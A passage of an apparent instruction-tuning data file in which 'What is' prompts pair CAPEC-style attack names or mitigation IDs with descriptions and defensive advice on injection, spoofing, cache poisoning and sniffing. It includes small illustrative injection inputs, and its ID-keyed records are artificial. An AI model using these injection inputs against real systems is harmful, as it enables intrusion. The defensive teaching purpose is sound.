An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack."}, {"instruction": "What is", "input": "coa-135-0", "output": "Limit the usage of formatting string functions, and never pass user-controlled data as the format string itself: use printf(\"%s\", input) rather than printf(input). Enable compiler warnings for non-literal format strings so such calls are caught at build time."}, {"instruction": "What is", "input": "coa-135-1", "output": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters."}, {"instruction": "What is", "input": "LDAP Injection", "output": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value."}, {"instruction": "What is", "input": "coa-136-0", "output": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content. Prefer escaping per the LDAP filter (RFC 4515) and distinguished name (RFC 4514) rules, or a library that builds filters from parameters, over a hand-written denylist."}, {"instruction": "What is", "input": "coa-136-1", "output": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. 
Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application."}, {"instruction": "What is", "input": "Parameter Injection", "output": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example."}, {"instruction": "What is", "input": "coa-137-0", "output": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise."}, {"instruction": "What is", "input": "coa-137-1", "output": "Treat all user input as untrusted data that must be validated before use."}, {"instruction": "What is", "input": "Reflection Injection", "output": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. 
If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application."}, {"instruction": "What is", "input": "Relative Path Traversal", "output": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure."}, {"instruction": "What is", "input": "coa-139-0", "output": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement"}, {"instruction": "What is", "input": "coa-139-3", "output": "Implementation: Prefer working without user input when using file system calls"}, {"instruction": "What is", "input": "Client-side Injection-induced Buffer Overflow", "output": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. 
For example, if the client-side application is a browser, the service will host a webpage that the browser loads."}, {"instruction": "What is", "input": "coa-14-0", "output": "The client software should not install untrusted code from a non-authenticated server."}, {"instruction": "What is", "input": "coa-14-1", "output": "The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers."}, {"instruction": "What is", "input": "coa-14-2", "output": "Perform input validation for length of buffer inputs."}, {"instruction": "What is", "input": "coa-14-4", "output": "Use an abstraction library to abstract away risky APIs. Not a complete solution."}, {"instruction": "What is", "input": "coa-14-6", "output": "Ensure all buffer uses are consistently bounds-checked."}, {"instruction": "What is", "input": "Bypassing of Intermediate Forms in Multiple-Form Sets", "output": "Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application."}, {"instruction": "What is", "input": "Cache Poisoning", "output": "An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. 
The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value."}, {"instruction": "What is", "input": "coa-141-0", "output": "Configuration: Disable client side caching."}, {"instruction": "What is", "input": "coa-141-1", "output": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes."}, {"instruction": "What is", "input": "DNS Cache Poisoning", "output": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack."}, {"instruction": "What is", "input": "coa-142-0", "output": "Configuration: Make sure your DNS servers have been updated to the latest versions"}, {"instruction": "What is", "input": "coa-142-1", "output": "Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. 
Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet."}, {"instruction": "What is", "input": "coa-142-2", "output": "Configuration: Disable client side DNS caching."}, {"instruction": "What is", "input": "Detect Unpublicized Web Pages", "output": "An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public."}, {"instruction": "What is", "input": "Detect Unpublicized Web Services", "output": "An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable."}, {"instruction": "What is", "input": "Checksum Spoofing", "output": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. 
This would prevent the recipient from realizing that a change occurred. Because an unkeyed checksum or hash can be recomputed by anyone who can modify the message, it offers no integrity protection against an active adversary; a keyed MAC or a digital signature is required for that."}, {"instruction": "What is", "input": "XML Schema Poisoning", "output": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema."}, {"instruction": "What is", "input": "coa-146-0", "output": "Design: Protect the schema against unauthorized modification."}, {"instruction": "What is", "input": "coa-146-1", "output": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification."}, {"instruction": "What is", "input": "coa-146-2", "output": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol with certificate validation enabled to prevent modification of traffic in transit and to avoid unauthorized modification."}, {"instruction": "What is", "input": "XML Ping of the Death", "output": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. 
In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target."}, {"instruction": "What is", "input": "coa-147-0", "output": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval."}, {"instruction": "What is", "input": "coa-147-1", "output": "Implementation: Provide for network flow control and traffic shaping to control access to the resources."}, {"instruction": "What is", "input": "Content Spoofing", "output": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes."}, {"instruction": "What is", "input": "Explore for Predictable Temporary File Names", "output": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. 
If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks."}, {"instruction": "What is", "input": "Command Delimiters", "output": "An attack of this type exploits a program's vulnerability that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation, is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on."}, {"instruction": "What is", "input": "coa-15-0", "output": "Design: Perform allowlist validation against a positive specification for command length, type, and parameters."}, {"instruction": "What is", "input": "coa-15-1", "output": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then the commands are not running under a privileged account."}, {"instruction": "What is", "input": "coa-15-2", "output": "Implementation: Perform input validation for all remote content."}, {"instruction": "What is", "input": "coa-15-3", "output": "Implementation: Use parameterized interfaces such as JDBC prepared statements, and invoke external programs with an explicit argument array rather than through a shell, so that user data is never interpreted as part of the command."}, {"instruction": "What is", "input": "Collect Data from Common Resource Locations", "output": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. 
Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc directory on Unix systems. Adversaries can take advantage of this to commit other types of attacks."}, {"instruction": "What is", "input": "Identity Spoofing", "output": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principal or use stolen / spoofed authentication credentials."}, {"instruction": "What is", "input": "coa-151-0", "output": "Employ robust authentication processes (e.g., multi-factor authentication)."}, {"instruction": "What is", "input": "Input Data Manipulation", "output": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target."}, {"instruction": "What is", "input": "Resource Location Spoofing", "output": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. 
By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals."}, {"instruction": "What is", "input": "coa-154-0", "output": "Monitor network activity to detect any anomalous or unauthorized communication exchanges."}, {"instruction": "What is", "input": "Screen Temporary Files for Sensitive Information", "output": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache."}, {"instruction": "What is", "input": "Sniffing Attacks", "output": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. 
AiTM attacks are predominantly active and often alter the content of the communications themselves."}, {"instruction": "What is", "input": "coa-157-0", "output": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception."}, {"instruction": "What is", "input": "Sniffing Network Traffic", "output": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information."}, {"instruction": "What is", "input": "coa-158-0", "output": "Obfuscate network traffic through encryption to prevent its readability by network sniffers."}, {"instruction": "What is", "input": "coa-158-1", "output": "Employ appropriate levels of segmentation to your network in accordance with best practices."}, {"instruction": "What is", "input": "Redirect Access to Libraries", "output": "An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. 
If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation."}, {"instruction": "What is", "input": "coa-159-0", "output": "Implementation: Restrict the permission to modify the entries in the configuration file."}, {"instruction": "What is", "input": "coa-159-1", "output": "Implementation: Check the integrity of the dynamically linked libraries before use them."}, {"instruction": "What is", "input": "coa-159-2", "output": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries."}, {"instruction": "What is", "input": "Dictionary-based Password Attack", "output": "\n An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.\n "}, {"instruction": "What is", "input": "coa-16-0", "output": "Create a strong password policy and ensure that your system enforces this policy."}, {"instruction": "What is", "input": "coa-16-1", "output": "Implement an intelligent password throttling mechanism. 
Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2."}, {"instruction": "What is", "input": "coa-16-2", "output": "Leverage multi-factor authentication for all authentication services."}, {"instruction": "What is", "input": "Exploit Script-Based APIs", "output": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support
